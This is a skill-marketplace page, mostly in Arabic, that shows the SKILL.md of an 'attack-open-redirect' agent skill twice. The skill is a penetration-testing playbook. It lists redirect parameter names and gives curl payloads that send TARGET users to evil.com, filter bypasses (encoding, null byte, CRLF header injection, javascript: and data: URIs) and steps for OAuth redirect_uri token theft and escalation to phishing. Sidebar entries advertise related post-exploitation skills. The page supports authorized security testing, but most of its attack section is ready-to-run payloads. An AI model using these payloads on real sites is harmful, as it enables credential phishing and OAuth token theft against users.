تشغيل أي مهارة في Manus بنقرة واحدة

ابدأ الآن

attack-open-redirect

النجوم٦١٧

التفرعات١٠٢

آخر تحديث١ يونيو ٢٠٢٦ في ١٩:١٦

Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains

التثبيت

التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.

تشغيل في Manus

المصدر

CyberStrikeus

CyberStrikeus/CyberStrike

فتح مستودع GitHub عرض مستودعات المنشئ

تنزيل

تشغيل في Manus

المهن ذات الصلةSOC

استنادا إلى تصنيف SOC المهني

محللو أمن المعلوماتمهن الحاسوب والرياضيات·SOC 15-1212

SKILL.md

readonly

name	attack-open-redirect
description	Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
category	web-application
version	1.0
author	cyberstrike-official
tags	["open-redirect","web","phishing","oauth","attack"]
tech_stack	["web"]
cwe_ids	["CWE-601"]
chains_with	["attack-cors","attack-jwt"]
prerequisites	[]
severity_boost	{"attack-jwt":"Open redirect + OAuth = JWT/token theft"}

Open Redirect

Objective

Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.

Testing Methodology

Phase 1: Identify Redirect Parameters

Common parameter names:

url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref

Phase 2: Basic Payloads

# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"

# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"

# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"

# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"

# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"

Phase 3: Filter Bypass

# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"

# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"

# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"

# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"

# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"

# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"

# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"

Phase 4: OAuth Token Theft

# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
  --client-id CLIENT_ID \
  --redirect-uri "https://TARGET/callback" \
  --json-output

If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.

Phase 5: Impact Escalation

Redirect in login flow → credential phishing
Redirect in OAuth flow → token theft (P1)
Redirect in email verification → account takeover
Redirect + SSRF → internal access

What Constitutes a Finding

Finding	Severity
Open redirect + OAuth token theft	Critical (P1)
Open redirect in login/auth flow	High (P2)
Generic open redirect	Medium (P3)
JavaScript scheme redirect (XSS)	High (P2)

Evidence Requirements

URL with redirect parameter and payload
Response showing 302/301 to attacker domain
For OAuth: stolen authorization code/token
Location header value in response

Tools

attack_script oauth_tester — OAuth redirect_uri bypass testing
curl — manual redirect testing

References

المزيد من هذا المستودع

نفس المستودع

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	attack-open-redirect
description	Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
category	web-application
version	1.0
author	cyberstrike-official
tags	["open-redirect","web","phishing","oauth","attack"]
tech_stack	["web"]
cwe_ids	["CWE-601"]
chains_with	["attack-cors","attack-jwt"]
prerequisites	[]
severity_boost	{"attack-jwt":"Open redirect + OAuth = JWT/token theft"}

Open Redirect

Objective

Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.

Testing Methodology

Phase 1: Identify Redirect Parameters

Common parameter names:

url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref

Phase 2: Basic Payloads

# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"

# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"

# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"

# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"

# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"

Phase 3: Filter Bypass

# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"

# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"

# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"

# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"

# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"

# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"

# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"

Phase 4: OAuth Token Theft

# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
  --client-id CLIENT_ID \
  --redirect-uri "https://TARGET/callback" \
  --json-output

If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.

Phase 5: Impact Escalation

Redirect in login flow → credential phishing
Redirect in OAuth flow → token theft (P1)
Redirect in email verification → account takeover
Redirect + SSRF → internal access

What Constitutes a Finding

Finding	Severity
Open redirect + OAuth token theft	Critical (P1)
Open redirect in login/auth flow	High (P2)
Generic open redirect	Medium (P3)
JavaScript scheme redirect (XSS)	High (P2)